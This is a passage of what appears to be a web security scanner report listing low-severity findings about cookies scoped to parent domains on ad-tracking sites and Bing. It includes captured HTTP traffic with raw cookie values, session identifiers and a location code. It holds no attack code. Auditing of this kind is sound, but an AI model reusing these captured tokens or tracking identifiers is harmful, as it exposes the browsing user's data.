Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:02:46 GMT
Set-Cookie: bklc=4dbe10c6; expires=Wed, 04-May-2011 02:02:46 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=cZ6ypw16vaVVIHOf; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhqhz49GntsAKsRye84HQRsCkP9dCzVPcT1Yymz7X7wyweM1umev4XIU0RGUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIuelywizF9y1666RsESFl9atcTCdEyVPf2MJQ1/cbR4htReX5U1jsPRMXVFxIaB1WchmnQSs921jDwQopSCXhyjDwGCsBrItY3g8/wzCX6crQdWOi8PmX9==; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMg2ny69RCZXGYnSNQ3Bxcaye2dmfmlYJqSyPRZlE5gHT/DW/+WBJ/LbYKda4zOcaH5OOmMC65FaFzcOhzdUu35eNIjfld5TuK+2WS9mkTtxX0zKUkEKdCeTLtAzCibQ9cMkusKwymOvmyxxzcjk/HxopysptdVE2p2DvDj+q2sFHeZ/u9tMvrOHW19a1bwwkCNo8JUsyEwMgbvSXN7+76HfulK8PtmI/2JitnIHCygBVx91BS5hoERBZTbdIR+NfbIbiCrLa7MdLRidBK2bJ7vRM1sTteRXZ0UJn+PJ1ojJ0oQ9EESkDcYCHL82cKb8UWS3QFOmjlnlZQt0Ri5+70fI3hH/J//pQ9C1SWT0h6Ua/xOkr5OCe3OKFC4ryPUuzrqlI35zqexq+8ZJffFXeiGhMM9==; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:02:46 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
16.48. http://tags.bluekai.com/site/3945  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3945?ret=html&phint=__bk_t%3DWelcome%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=22181052 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bk=e1mPh2iZ/VKVIHOf; bkc=KJpM8sPQZsfY0nO88x84HQRsOATQd8Tvv+IhAysacXmYTn1OIKFZ1MvLHrnUGws7ZYeT7ay1e9KZ1beyD8oHIRTB3cyxMVpKqHPDX6crxISel94M9yODsYNN; bko=KJ0E8VBQtnh0CbXYQ0ux5Vqaek2ICiGQbIuucqb1e1qLe9pfyvyfF9y1vR+OnsXTuhU/0rROLHvOg9yySh/qC1U1999p5HUd; bkw5=KJpE+Z/9QCvsW6YuWzxWAo0X666Rs4uHjJCxjsfq/VuRDVEzfDcLW3QRCsEMgj7n0999mnyv5x==

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Set-Cookie: bklc=4dbe0fda; expires=Wed, 04-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=chBAO2thl+ZVIHOf; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAKWVdp84HQRsCAyQUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIEWLYeT7nywe5OBsCL6g5Xe82NHxIRb5eYCXAcTR7yl/UpKUAVWNWgXsMEdaO1c78sJQmeY59RV46Gpv5th98RBGjwBr3bYSel/41CdAwCQ491l+ugD=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQr1Vdp8KHxjSwQVcp0CtIYQ0uxBSjaE+XIHZ3Qv0EulR9jRljsHMtQPklKOARDCSeVBbXWnN1evo9PMRwuYyHvLq11/AByZJk999zIhAI; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNvhW9DCVIh/sCVY6+CLq9BpmI5ZEvrzPPRkCM5D7cYOYsyVTxATQFRnfbYMuQtQCjiRVa+RI1nVBMRtEgjuZ0dXlcmFHNTVQHRQsouEvqB8eHTccqQhS1B0nCMWGDnkqRtanZEGuDDxImL66TEQREwwZI2ddSlTZwktSBFMNSOvTJGsO5vDLAkzZZm8QrUuyegRJnAneLR0V3cfjbGpDnDQ8ukO3+XBYMEg48wf2bfP285QlTDoday7JYTSFqMwPPVhtiMrL0toXVXLCr6i6yhyEDuSCCEViYMKFjNTIBKa0Y9jrHLW8tnyloz0TLfp2IffuDvDPGoJvWLoTxxSdv1GgqYZipcpnyI+mfNXgXd4yc+WaPx; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjv1QHwWw0OfrO7R7OcItxF6syBFJz1njoeqag+O2eOP1M999Jbv/oA=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 997
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1182795&id=1182798&id=1182799&id=1182843&t=2" width=1 height=1 border=0 alt="">
<img src="h
...[SNIP]...
16.49. http://um.simpli.fi/ab_match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /ab_match

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ab_match HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: um.simpli.fi

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 02 May 2011 02:09:12 GMT
Content-Type: text/html
Connection: close
Set-Cookie: uid=G2tSSfsD3T9Q3E3BUMibCF%3D%3D; domain=.simpli.fi; path=/; expires=Tue, 01-May-2012 02:09:12 GMT
P3P: policyref="http://www.simplifi.com/w3c/Policies.xml", CP="ADMa DEVa PSAa PSDa OUR IND DSP NON COR"
Location: http://ads.adbrite.com/adserver/vdi/762701?d=49526B1B3FDD03FBC14DDC50089BC850
Content-Length: 0

16.50. http://user.lucidmedia.com/clicksense/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=88436487f575811a&r=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: user.lucidmedia.com

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: private
P3P: CP=NOI ADM DEV CUR
Date: Mon, 02 May 2011 02:35:25 GMT
Expires: Mon, 02 May 2011 02:35:26 GMT
Set-Cookie: 2=2yiXqyLLXLn; Domain=.lucidmedia.com; Expires=Tue, 01-May-2012 02:35:26 GMT; Path=/
Location: http://ads.adbrite.com/adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D
Content-Length: 0
Connection: close

16.51. http://va.px.invitemedia.com/goog_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=Tb4RXwAHNm8K5ovHrlhLb5hGYOYV9br2QoBlYA&creativeID=110455&message=eJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304303011+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuF49ZlFgEli8eofb1kUGDVW7wTSBkwWG29/ecvCJcKxYj6rAKPE5L7TQFkGDQYDBgsGoOjO+8xA0Vnz1yJEAeCpF3s="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: segments_p1="eJzjYuZojOBi4Wj6zwQkm8FkZwczFzPHRBUgMd0YyJ/5AyQ6B0zOBZLMHAuCgcy1+xmB5PoPjECBjcVA5o5djFxcHDv3MQvMOjjnHQtQeL8fUPhgN0jdoSMgjUdzgMyTYDNO5wCJcyD+he8gky/uBZFPLoCM+xcOIjgACq4pOw=="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjkuY4HijAJLF49Y+3LAqMGvdBtAGTxcbbX96ycAlzbAsVYJSY3HcaKMmgwWDAYMEAFNzrAhScNX8tQhAAe68V+g=="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
16.52. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.24-7pressrelease.com
Path:   /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php HTTP/1.1
Host: www.24-7pressrelease.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:39 GMT
Server: Apache
Vary: User-Agent
Set-Cookie: tf7sid=a9l3d80hrmsh2jf67cj61qtuj2; path=/; domain=.24-7pressrelease.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 37188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Press Release - The
...[SNIP]...
16.53. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=I=1&TS=1304292748

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:30 GMT
Connection: close
Set-Cookie: _HOP=; domain=.bing.com; path=/
Set-Cookie: _SS=SID=54196B2489E649DC9D985351F7EDDDA0; domain=.bing.com; path=/
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...
16.54. http://www.bing.com/HPImageArchive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /HPImageArchive.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HPImageArchive.aspx?format=xml&idx=0&n=1&nc=1304310754936 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2483
Content-Type: text/xml; charset=utf-8
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:36 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8" ?><images><image><startdate>20110501</startdate><fullstartdate>201105010700</fullstartdate><enddate>20110502</enddate><url>/fd/hpk2/EmpireState_EN-US1121929261.jpg
...[SNIP]...
16.55. http://www.bing.com/fd/fb/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/r?v=7_04_0_906814&sId=0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; RMS=F=GgAg

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:32 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:32 GMT; domain=.bing.com; path=/
Content-Length: 2125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...
16.56. http://www.bing.com/fd/fb/u  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/u

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/u?v=7_04_0_906814&sId=0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: close
